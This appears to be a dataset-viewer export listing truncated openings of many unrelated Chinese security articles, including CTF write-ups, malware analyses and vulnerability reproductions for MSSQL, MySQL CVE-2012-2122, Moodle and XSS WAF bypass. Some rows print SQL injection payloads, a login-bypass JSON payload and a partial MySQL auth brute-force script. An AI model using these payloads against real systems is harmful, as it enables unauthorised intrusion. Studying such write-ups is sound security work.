## 0x01安装过程过滤不严导致Getshell
_前提:有删除/config/install.lock权限_
### 1\. 结合网上爆出的后台任意文件删除漏洞
#/admin/app/batch/csvup.php
$classflie=explode('_',$fileField);
$classflie=explode('-',$classflie[count($classflie)-1]);
$class1=$classfl... | 社区文章 |
# 对 Hawkeye Keylogger - Reborn v8 恶意软件活动的深入分析
|
##### 译文声明
本文是翻译文章,文章来源:cloudblogs.microsoft.com
原文地址:<https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
如今,大部分网络犯罪都是由地下市场助长的,在地下市场,恶意软件和网络犯罪服务是可以购买的。这些市场在深层网络商品化恶意软件运作。即使是网... | 社区文章 |
# 从sql注入到连接3389
据库为sqlserver
### 判断字符、数字型、闭合方式
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
遗漏字元字串 ' AND 显示状态Flag = 1 ORDER BY 排序 DESC ' 后面的引号。
D:\S_JCIN\WEBSITE\OUTWEB\L_CT\NEWS\../../../_sysadm/_Function/DB_Function.asp, 列158
数字型。
判断是否是DBA
and 1=(select is_srvrolemember('sysadmin'))
sele... | 社区文章 |
**作者:Koalr
原文链接:<https://koalr.me/posts/core-concept-of-yarx/>**
xray 得益于 Go
语言本身的优势,没有那么多不安全的动态特性,唯一动态是一个表达式引擎(CEL),用的时候也加了各种类型校验,和静态代码没有什么区别了,因此基本不可能实现
RCE 之类的反制效果。那么我们换个思路,有没有办法让 xray 直接无法使用呢。
无法使用有两个表现,一个是让其直接崩溃掉,效果就是如果用 xray 扫描一个恶意 server,xray 直接 panic 退出。xray 0.x.x
之前的某些版本确实有这种 bug,我当时耗费了很大的精力去这个定位问题然后开心的修掉了,这里... | 社区文章 |
# 软件供应链安全威胁:从“奥创纪元”到“无限战争”
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:弗为,阿里安全-猎户座实验室 安全专家
> 本文篇幅较长、内容干货,建议收藏慢慢看
在2018年5月到12月,伴随着阿里安全主办的软件供应链安全大赛,我们自身在设计、引导比赛的形式规则的同时,也在做着反思和探究,直接研判诸多方面潜在风险,以及透过业界三方的出题和解题案例分享,展示了行业内一线玩家对问题、解决方案实体化的思路
(参见如下历史文章:
[1、软件供应链安全大赛,C源代码赛季总结](http://mp.weixin.qq.com/s?__biz=MzIxMjEwNTc4NA==&mi... | 社区文章 |
**原文链接:[New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA
app](https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/ "New Mac variant of
Lazarus Dacls RAT distributed via Trojanized 2FA app")**
**译者:知道创宇404实验室翻译组**
有关研究团队最新发现了一... | 社区文章 |
本文来自 [i春秋学院](http://bbs.ichunqiu.com/thread-12374-1-1.html?from=paper)
2016/7/12 用时两天
各位表哥, 看完觉得写的好的话,或者某些地方不足之处 不要忘记评论哦。 我会在你们评论中不断改进的. 纯属娱乐,并无恶意 以下漏洞已提交至管理员
并且已完美修复...
警告:以下内容可能令你感到不适.如果感到不适请立即把硬盘拔了丢水里,冷静冷静
目标站点:www.xxxxx.com 思路 目标服务器(常用端口) ——> C段 (常用端口) (各种可能出现的漏洞)
经过十几分钟的信息收集(请无视这句话写来装逼用的)
发现某系统存在弱口令一枚
www.xxxxx.co... | 社区文章 |
今天时间相对充裕,敲几下键盘为大家介绍下互联网常用位置定位技术中的wifi定位,前面发表了《互联网定位技术小谈》
(连接<https://xianzhi.aliyun.com/forum/read/775.html>
)阅读量还不错,但是属于入门级介绍,很多人看了觉得不够过瘾。今天写的这篇文章内容相对简短,单一介绍下WIFI定位技术,感兴趣可以花几分钟时间阅读下,也可以收藏下作为厕所读物。
“WIFI定位技术”是位置服务提供者在努力提高定位成功率和准确率的过程中诞生的。查阅各大百科系统,目前还查不到WIFI定位这种严格意义上的定义,却已经被位置服务类行业所认可。大家都知道WIFI的目的是为了实现无线通信。但是,在这个通信过程中,wi... | 社区文章 |
### 前言
近两年,Java的受欢迎程度和市场占有率一直是稳中向好,2017年数据显示,Java程序员的就业率和平均年薪均处众多语言的前列,由于各大培训班的努力,17年Java程序员的产出量也急剧增长。Java,确实是一门吃得稳饭的语言。
2018年开始了,大家都在专注地写着自己的bug~
开个玩笑……不过,从代码审计的角度来说,这句话说的一点都不过分。而在众多漏洞中,最数反序列化漏洞的表现最‘辉煌’,从15年影响WebSphere、JBoss、Jenkins、WebLogic等大型框架的Apache
Commons Collections 反序列化远程命令执行漏洞,到17年末WebLogic XML 反序列化引起的挖矿风... | 社区文章 |
# DolphinPHP
>
> DolphinPHP(海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-> 角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件、钩子、数据包之间的版本和依赖关系,进一步降低了代码和数据的冗余,以方便开发者快速构建自己的应用。
## 漏洞分析
看到`application\common.php#action_log`函数
观察到有一处`call_user_func`,向上回溯一下两个参数看是否可控
分别为`$param[1]`和`$lo... | 社区文章 |
来源链接:[伯乐在线](http://blog.jobbole.com/106496/)
本文作者:[jackyspy](http://www.jobbole.com/members/jackyspy)
公司在用的一款防火墙,密码意外遗失,无法登陆管理平台。虽然防火墙可以正常工作,但却无法修改配置,不能根增加和删除访问列表中的IP地址,不能调整访问策略。防火墙默认仅开通https
web管理界面,未开启telnet、ssh等其他管理通道。
联系厂家寻求技术支持,被告知必须返厂更换芯片,费用大约在2000元左右(网上搜了一下,几乎所有密码遗失的客户最终都只能选择返厂)。公司用于该网络联网的仅此一台防火墙设备,终端数量在500以上,无其... | 社区文章 |
# java ctf题
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 记录一下最近的一些java题。。。。
## RCTF-EZshell
有一说一,这个题目应该是web…..
题目给了一个war包,非常明显是通过tomcat搭建。
为了方便我转换成了springboot项目。项目:
其实非常简单。。。
就我们写一个恶意类,然后继续aes加密然后在base64加密之后让服务端继续解密然后加载执行就欧克。。
最开始自己是写的静态代码,因为静态代码实例化的时候要执行,然后就可以执行命令。
try{
Runtime.getRuntime().exec(new Strin... | 社区文章 |
# 针对CVE-2018-0797 RTF样式表UAF漏洞的深入分析
##### 译文声明
本文是翻译文章,文章原作者 Wayne Chin Yick Low,文章来源:www.fortinet.com
原文地址:<https://www.fortinet.com/blog/threat-research/a-root-cause-analysis-of-cve-2018-0797---rich-text-format-styles.html>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
在过去的几个月中,微软安全响应中心(MSRC)发布了许多Windows更新,陆续修复了由FortiGuard实验室发现的多个UAF... | 社区文章 |
# 偷盗的艺术:Satori变种正在通过替换钱包地址盗取加密货币
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
在我们2017年12月5日发布的关于Satori的文章中,我们提到Satori僵尸网络正在以前所未有的速度快速传播。自从我们的文章发布以后,安全社区、ISP、供应链厂商共同协作,Satori
的控制端服务器被 sinkhole、ISP和供应链厂商采取了行动,Satori的蔓延趋势得到了暂时遏制,但是Satori的威胁依然存在。
从 2018-01-08 10:42:06 GMT+8 开始,我们检测到 Satori
的后继变种正在端口37215和52869上重新建立整个僵尸网络。值得注意... | 社区文章 |
# 域前置水太深,偷学六娃来隐身——域前置攻击复现
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
又是平静的一天,吉良吉影只想过平静的生活。
哦,对不起拿错剧本了。
重保期,RT 使用了多种方法来攻击资产, 其中不乏低级的方法。
1\. 给客服 MM 传恶意文件,威胁不运行就投诉的,伪造<五一放假通知>钓鱼的。
2\. 邮件内嵌病毒的。(以至于笔者公司真发了一个放假通知邮件,一堆人问是不是钓鱼)
我司的放假通知邮件
3\. 甚至还有跟我们分析人员聊天的。(RT:世界上无聊的人那么多,为何不能算我一个)
RT 与我司分析师小哥哥的聊天记录
4\. 当然高级的手法也有很多,比如像我们之前... | 社区文章 |
## 漏洞简介
`Moodle` 是世界上最流行的学习管理系统。在几分钟内开始创建您的在线学习网站!
`Moodle`的`Shibboleth`认证模块存在一个未授权远程代码执行漏洞。这在大学中被广泛使用,以允许来自一所大学的学生与其他大学进行身份验证,从而使他们能够参加外部课程并与其他人一起玩乐。
## 漏洞影响
3.11, 3.10 to 3.10.4, 3.9 to 3.9.7 and earlier unsupported versions
需要开启 `Shibboleth` 认证模块
可以 `fofa` 查看其使用,可以看到有 `13w` 条 `moodle` 应用
## 环境搭建
为了省去一些麻烦,这里我已经搭建... | 社区文章 |
### Xnuca - hardphp writeup
题目被大佬非预期的注入成功了,膜大佬,tql ..逃 。。。。
非预期解也挺有意思的,详情可以去看<https://xz.aliyun.com/t/3428>,我这里只说一下预期解法吧。
题目的docker环境已经上传到<https://github.com/wonderkun/CTF_web/blob/master/web400-12/README.md?1543386212265>了,感兴趣的可以去下载。
下面是题解:
#### 0x1 任意session伪造漏洞
首先看session的处理类:
# file: include/MySessionHandle.... | 社区文章 |
# start
刚刚拿到这道题的时候发现这道题目的内存镜像非常特殊,Misc 取证常用的软件诸如 取证大师 和 vol 都搞不定这种内存镜像。(当然因为我电脑不存在
python2 环境,所以导致我手上的 vol 实际是 vol3, 这还是蛮多区别的,所以我一开始以为我的 vol 锅了。后来问了问同队的师傅, 确实是
vol 和 取证都爆炸了 找不到 Profile 也不能确定类型)
所以面对如此棘手的一个问题,我想起了万年前看到一个神器,尸解 (Autopsy)。
> 当时我的师傅找了官方的 training 课程的优惠券 (其实就是因为疫情打折直接白送) 不过这是题外话了
官网为 <https://www.autopsy.com... | 社区文章 |
#### 前言
* * *
之前写过类型的水文,感觉写的一般。重新再苟了一遍。
#### Fuzz
* * *
简单粗暴的Fuzz,是我的首选,可以从Github,推特以及一些`xss_payload`分享网站,收集到足够的`xss_payload`进行Fuzz测试。
首先我们先查看下,waf拦截包的差异,正常提交。
提交恶意`xss_payload`。
比较两次提交,waf拦截时,数据包出现`2548`这个关键数字。
接下来使用`Burp`的`Intruder`模块来Fuzz,导入payload。
fuzz`结束后`,点击HTTP历史标签下发的`Filter`弹出筛选过滤器界面,选择第三个,与关键字`2548`匹配上的将不再显示。... | 社区文章 |
# 概述:
这篇文章开始进入DLL注入和API钩取的部分,首先来看一下什么叫做DLL注入:
顾名思义,DLL注入是将某些DLL(动态链接库)强行加载到某个程序的进程中,从而完成某些特定的功能,。DLL注入与普通的DLL
加载的区别在于,加载的目标是其自身或者其他特定程序,而注入的目标是强制在某个进程中插入自定义的DLL。
在DLL注入的过程中,会频繁地接触到钩子这个概念,也就是Hook这个操作。
钩子的主要作用就是将消息和进程钩取过来,对于被钩取到的消息和进程,我们可以自己写程序对其进行一些修改或者查看,这样就完成了对于程序原本功能的修改。
# 消息钩子:
本文要实现的功能主要依托于Windows中的消息钩子。Windows为用于提... | 社区文章 |
## CVE-2012-2122 Mysql身份认证漏洞
### 影响版本
`Mysql`在`5.5.24`之前
`MariaDB`也差不多这个版本之前
### 漏洞原理
只要知道用户名,不断尝试就能够直接登入`SQL`数据库,按照公告说法大约`256`次就能够蒙对一次
### 漏洞复现
#### msf利用
hash解密
得到密码即可登录
#### python exp
#!/usr/bin/python
import subprocess
while 1:
subprocess.Popen("mysql -u root -p -h 192.168.0.16 --pass... | 社区文章 |
# D3CTF wp By ez_team
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## Web
### 8bithub
json sql注入 登录admin账号
{"username":"admin","password":{"password":1}}
服务端使用`sendmailer`包发邮件,通过调试可以进行原型链污染实现RCE
Exp如下
import requests as r
tmp = r.post('http://7281fd0fb4.8bit-pub.d3ctf.io/user/signin',json={"username":"admin... | 社区文章 |
# 移动平台千王之王大揭秘
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
译文仅供参考,具体内容表达以及含义原文为准。
移动平台千王之王大揭秘
360 烽火实验室
2016年6月1日
摘 要
²近期,360烽火实验室发现一类潜藏两年之久的Android木马,被利用专门从事私彩赌博、短信诈骗活动。该木马集远程控制、中间人攻击、隐私窃取于一身,能够在受害者不知情的情况下,拦截并篡改任意短信,监控受害者的一举一动。通过对该类木马的追踪发现,常见的社交类软件也在攻击中被利用。
²我国刑法第三百零三条[[1]](http://www.66law.cn/tiaoli/9.aspx)规定:以营利为目的,聚众赌博,开设赌场或以... | 社区文章 |
# 【缺陷周话】第27期:不安全的随机数
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1、不安全的随机数
随机数应用广泛,最为熟知的是在密码学中的应用,随机数产生的方式多种多样,例如在JAVA程序中可以使用 java.util.Random
类获得一个随机数,此种随机数来源于伪随机数生成器,其输出的随机数值可以轻松预测。而在对安全性要求高的环境中,如 UUID 的生成,Token
生成,生成密钥、密文加盐处理。使用一个能产生可能预测数值的函数作为随机数据源,这种可以预测的数值会降低系统安全性。本文以JAVA语言源代码为例,分析不安全的随机数缺陷产生的原因以及修复方法。
详见CWE ID ... | 社区文章 |
##### 先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。
##### 先知技术社区投稿邮箱 : Aliyun_xianzhi@service.alibaba.com
* * *
今天早上看到沐师傅在知乎上的回答 , 感觉自己还是有点太为了比赛而比赛了
以后还是得多联系实际的网络攻防对抗
写一篇小总结吧 , 记录一些小经验和一些比较有意思的事
> **首先感谢 A1Lin学长 以及 Yolia 学姐的强力输出 , 真的强 , 不得不服 , orzzzz , 深感荣幸**
* * *
#### 网络拓扑 :
主办方在比赛之前并没有提供网络拓扑
所以在得到这个信息以后 , 到时候肯定先要主... | 社区文章 |
## Uber Bug Bounty:将self-XSS转变为good-XSS
既然Uber bug赏金计划已公开发布,我可以发布一些我最喜欢的提交内容,这些内容在过去的一年里一直很想做。
在Uber的[合作伙伴门户网站上](https://partners.uber.com/),驱动程序可以登录并更新其详细信息,我发现了一个非常简单的经典XSS:将其中一个配置文件字段的值更改为
<script>alert(document.domain);</script>
导致代码被执行,并弹出一个警告框。
注册后,这需要花费两分钟的时间才能找到,但现在又来了。
### Self-XSS
能够在另一个站点的上下文中执行额外的,任意的Ja... | 社区文章 |
# jira环境搭建及受限文件读取原理和深思CVE-2021-26086
## 一、环境搭建踩坑
坑太多了 装了差不多七八个小时才装好
也是给自己找一些经验。不过不得不说在装软件的同时也学到了非常多的东西,实战的项目感觉就是会有不一样的感觉。多动手总是会有好处的。
我先发几个步骤 然后罗列一下我猜到的一些坑的点,算是把这个环境给装好了。因为我是mac系统,参照着一个步骤来的,但是中间夹着一些另外的,使用通用的破解插件。
### 一、安装步骤
<https://blog.csdn.net/pang787559613/article/details/101269073>
<https://www.jianshu.com/p/da0ddd... | 社区文章 |
# SQL注入绕过某Dog
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 一、环境搭建
下载最新版的安全狗
安装后配置好环境(将防护等级修改为高级)
注:此次使用的为sqli-lab靶场,懒得自己写环境了。
## 二、尝试绕过
使用普通的注入语句尝试,被拦截,此时不要慌,想绕狗呢,就必须知道那个关键字被识别了,想办法使用相同的参数去代替。
语句很短,盲猜是 and 被识别了,删掉之后页面正常。
先来看这句注入 `?id=1' and 1=1--+` 可以理解为 and 前后的条件达成一致不会报错,所以这里的 and 可以替换为 or 、 xor
、&& 、|| 等等,1=1 、1=2 这种... | 社区文章 |
作者:LoRexxar'@知道创宇404实验室
刚刚4月过去的TCTF/0CTF2018一如既往的给了我们惊喜,其中最大的惊喜莫过于多道xss中Bypass
CSP的题目,其中有很多应用于现代网站的防御思路。
其中bl0g提及了通过变量覆盖来调用已有代码动态插入Script标签绕过`strict-dynamic`CSP的利用方式。
h4xors.club2则是通过Script Gadgets和postmessage中间人来实现利用。
h4x0rs.space提及了Appcache以及Service worker配合jsonp接口实现的利用思路。
其中的很多利用思路非常精巧,值得研究。所以我花费了大量时间复现其中题目的思路以及环境,希... | 社区文章 |
# 从外网到域控(vulnstack靶机实战)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:<http://vulnstack.qiyuanxuetang.net/vuln/detail/2/>
拓扑结构大体如下:
话不多说,直接开搞..
## 外网初探
打开页面后发现是一个Yxcms的站点,关于Yxcms的漏洞可以参考:<https://www.freebuf.com/column/162886.html>
然后找到后台,随手一个弱口令:admin、123456便进入了后台(实战中也有很多的站点是弱口令,只能说... | 社区文章 |
# 安全快讯22 | iPhone被曝安全隐患,攻击者可控制手机麦克风和摄像头
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 诈骗先知
### “微信自动抢红包”软件存在侵害用户隐私安全风险
微信群里发的红包总有人会抢到,他可能使用了自动抢红包外挂软件。“微信自动抢红包”软件可以使用户在微信软件后台运行的情况下,自动抢到微信红包,并且设置有“开启防封号保护”应对微信软件的治理措施。
事实上,微信抢红包软件只是庞大外挂软件市场的个例之一。在APP商城搜索抢红包,红包助手等关键词,便有众多待下载APP列表出现。据了解,市场还存在其他外挂软件,不仅可以实现自动抢红包,还能够实现虚拟定位、虚假刷量... | 社区文章 |
# FRIDA脚本系列(一)入门篇:在安卓8.1上dump蓝牙接口和实例
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01.FRIDA是啥?为啥这么火?
`frida`目前非常火爆,该框架从`Java`层hook到`Native`层hook无所不能,虽然持久化还是要依靠`Xposed`和`hookzz`等开发框架,但是`frida`的动态和灵活对逆向以及自动化逆向的帮助非常巨大。
`frida`是啥呢,github目录[Awesome Frida](https://github.com/dweinstein/awesome-frida)这样介绍`frida`的:
> Frida i... | 社区文章 |
# 【技术分享】MSSQL 注入攻击与防御
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
****
作者:[ **rootclay**](http://bobao.360.cn/member/contribute?uid=573700421)
**预估稿费:400RMB**
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**传送门**
[**【技术分享】MySQL 注入攻击与防御**](http://bobao.360.cn/learning/detail/3758.html)
**
**
**前言**
上一篇文章已经为... | 社区文章 |
# 新型密码窃取木马:AcridRain
##### 译文声明
本文是翻译文章,文章原作者 Stormshield,文章来源:stormshield.com
原文地址:<https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/>
译文仅供参考,具体内容表达以及含义原文为准。
本文将介绍一种名为AcridRain的新型密码窃取软件,它在过去的2个月内更新频繁。
## 一、简介
AcridRain是一款用C/C++编写的新型密码窃取软件,最早于2018年7月11日在黑客论坛出现。它可以从多种浏览器窃取凭证,cookies及信用卡信息。除此之外,还有转储Te... | 社区文章 |
# 如何滥用Catalog文件签名机制绕过应用白名单
|
##### 译文声明
本文是翻译文章,文章原作者 bohops,文章来源:bohops.com
原文地址:<https://bohops.com/2019/05/04/abusing-catalog-file-hygiene-to-bypass-application-whitelisting/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
上周我在BsidesCharm 2019上做了一次[演讲](https://bohops.com/talks-projects/),简单讨论了COM方面内容,重点介绍了绕过Windows应用控制解决方案的一些技术。其中有... | 社区文章 |
### Struts框架
JSP使用`<s:token/>`标签,在struts配置文件中增加token拦截器
页面代码:
<s:form action="reg" theme="simple">
username:<s:textfield name="username"></s:textfield><br />
password:<s:password name="password"></s:password><br />
<s:token></s:token>
<s:submit value="注册"></s:submit>
</s:form>
... | 社区文章 |
# 【技术分享】我可能是用了假的隐身模式
|
##### 译文声明
本文是翻译文章,文章来源:同程安全应急响应中心
译文仅供参考,具体内容表达以及含义原文为准。
小编:文章提了一个探测chromium内核浏览器当前是否处于隐身模式的通用思路和具体实现,大家可以发散思维,搞一些有趣的事情。
**0x01 隐身模式**
隐身模式会打开一个新窗口,以便在其中以私密方式浏览互联网,而不让浏览器记录访问的网站,当关闭隐身窗口后也不会留下 Cookie
等其他痕迹。用户可以在隐身窗口和所打开的任何常规浏览窗口之间进行切换,用户只有在使用隐身窗口时才会处于隐身模式,本文将简单的谈一下基于模式差异化的攻击方法。
**0x02 浏览器模式的差异化**... | 社区文章 |
### 译者注
本文翻译自FireEye
<https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html>
译者力求贴近文章原意,特别注释:
threat actors 直译为"威胁行动者" 可理解为"攻击者"
non-graphical backdoors 非图形化的后门,如通过ssh触发的后门
compromised environments 被黑的环境,即被攻陷的环境 如网络、PC
non-exposed systems 直译为"非暴露系统",如内网... | 社区文章 |
# TL;DR
这篇博客是关于我在挖洞的时候发现的一个有趣的SQL注入问题。漏洞利用部分非常有趣,易受攻击的端点使用插入查询,由于应用程序的逻辑,我无法使用逗号。经过一些尝试之后,我成功地构造出了以下payload:
xxx'-cast((select CASE WHEN ((MY_QUERY) like 'CHAR_TO_BRUTE_FORCE%25') THEN (sleep(1)) ELSE 2 END) as char)-'
来作为利用代码的基础部分,从而获得10000美元的奖励。
# 多余的介绍
相信大家和我一样,很早就知道更新或插入查询中的注入问题。
原因与很多SQL注入一样,将未经过滤的输入传递给SQL查询... | 社区文章 |
# 条件竞争在Kernel提权中的应用
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## Double-Fetch漏洞简介
随着多核`CPU`硬件的普及,并行程序被越来越广泛地使用,尤其是在操作系统、实时系统等领域。然而并行程序将会引入并发错误,例如多个线程都将访问一个共享的内存地址。如果其中一个恶意线程修改了该共享内存,则会导致其他线程得到恶意数据,这就导致了一个数据竞争漏洞。数据竞争极易引发并发错误,包括死锁,原子性违例(`atomicity
violation`),顺序违例(`order violation`)等。当并发错误可以被攻击者利用时,就形成了并发漏洞。
当内核与用户线程... | 社区文章 |
# Pentestit V11内网渗透
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
最近发现了一个很好玩的域渗透练习平台:<https://lab.pentestit.ru/pentestlabs/7>
,这个平台发给我们一个vpn然后让我们进去他们内网进行渗透测试。这个域中包括各种各样的主机和服务,可以说是非常棒了,今天在这里给大家分享一下一些有意思的地方。好吧我承认,这篇文章是内网渗透之边缘ob,因为网络原因很多东西都受限制,今天在这起一个抛转引玉的作用,有什么不足之处还请大佬们多多关照。
## Start!
配置好vpn后,进入其内外,网络拓扑图如下:
这里有两个办公区... | 社区文章 |
红黑树writeup
一、解压缩,readme.txt,base64解密,得到
二、在线生成红黑树
<https://sandbox.runjs.cn/show/2nngvn8w>
按层添加节点,生成树后,按顺序删除节点,发现不止一个解,排序头5个字母应为flag{,最后一个应为},得出8,56,47,37,52,23应为黑,黑,红,红,黑,黑
选择一个符合条件的红黑树,输出结果
三、根据节点颜色编程输出结果
说明:因为红黑树非唯一解的问题,导致曾经输出了错误结果。 | 社区文章 |
# 【技术分享】CVE-2016-5483:利用mysqldump备份可生成后门
|
##### 译文声明
本文是翻译文章,文章来源:tarq.io
原文地址:<https://blog.tarq.io/cve-2016-5483-backdooring-mysqldump-backups/>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[overXsky](http://bobao.360.cn/member/contribute?uid=858486419)
预估稿费:100RMB
投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://b... | 社区文章 |
# CVE-2020-11896 Treck TCP/IP stack漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## Treck介绍
Treck
TCP/IP是专门为嵌入式系统和实时操作系统设计的高性能TCP/IP协议套件。旨在提供高性能,可扩展性和可配置性,以便轻松集成到任何环境中,无论处理器,商用RTOS,专有RTOS或者不使用任何RTOS,只要通过API,Treck
TCP/IP便可轻松集成到各种嵌入式产品中。
## 漏洞概述
CVE-2020-11896是Treck TCP/IP堆栈中的漏洞。攻击者可以将UDP数据包发送到目标设备的开放端口来执行远程代码。此漏洞的前提条件... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.